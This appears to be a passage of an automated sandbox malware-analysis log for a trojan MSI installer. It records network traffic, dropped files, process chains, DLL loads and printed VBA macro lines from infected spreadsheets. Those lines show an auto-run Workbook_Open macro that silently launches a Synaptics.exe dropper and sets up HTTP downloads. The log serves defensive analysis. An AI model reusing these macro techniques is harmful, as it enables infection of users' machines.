                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49761 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49762 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49771 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49772 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49774 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49773 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49785 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49787 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49818 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49819 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49829 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49828 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49832 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49831 version: TLS 1.2

                          System Summary

                          barindex
                          Document contains an embedded VBA macro with suspicious strings
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Document contains an embedded VBA with functions possibly related to ADO stream file operations
                          Source: 13zKLTpU.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Source: AFWAAFRXKO.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Document contains an embedded VBA with functions possibly related to HTTP operations
                          Source: 13zKLTpU.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Source: AFWAAFRXKO.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                          Source: 13zKLTpU.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: AFWAAFRXKO.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\63d57e.msiJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID6D6.tmpJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID754.tmpJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile created: C:\Windows\SysWOW64\._cache_MSID754.tmpJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSID754.tmpJump to behavior
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: Private Sub Workbook_Open()
                          Source: 13zKLTpU.xlsm.4.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: Private Sub Workbook_Open()
                          Source: AFWAAFRXKO.xlsm.4.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCXDBF7.tmp 2B6DB5563D77C827F5A662CB0A05359450DB29948863F9A5556C19CE14D05305
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\~$cache1 2B6DB5563D77C827F5A662CB0A05359450DB29948863F9A5556C19CE14D05305
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 3728
                          Source: MSID754.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                          Source: MSID754.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: Synaptics.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                          Source: Synaptics.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: RCXDBF7.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: ~$cache1.4.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: xyxmml.msiBinary or memory string: OriginalFileName vs xyxmml.msi
                          Source: xyxmml.msiBinary or memory string: OriginalFilenameb! vs xyxmml.msi
                          Source: classification engineClassification label: mal100.troj.expl.evad.winMSI@11/42@4/3
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CMLD753.tmpJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1360
                          Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFE59441C0F7560F9F.TMPJump to behavior
                          Source: Yara matchFile source: xyxmml.msi, type: SAMPLE
                          Source: Yara matchFile source: 3.0.MSID754.tmp.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Windows\Installer\63d57e.msi, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Installer\MSID6D6.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXDBF7.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Installer\MSID754.tmp, type: DROPPED
                          Source: C:\Windows\Installer\MSID754.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: xyxmml.msiReversingLabs: Detection: 65%
                          Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\xyxmml.msi"
                          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSID754.tmp "C:\Windows\Installer\MSID754.tmp"
                          Source: C:\Windows\Installer\MSID754.tmpProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                          Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 3728
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSID754.tmp "C:\Windows\Installer\MSID754.tmp"Jump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: wsock32.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: netapi32.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: textshaping.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: twext.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: cscapi.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: twext.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: cscapi.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: starttiledata.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: acppage.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: msi.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: aepic.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\5UJEwdq.iniJump to behavior
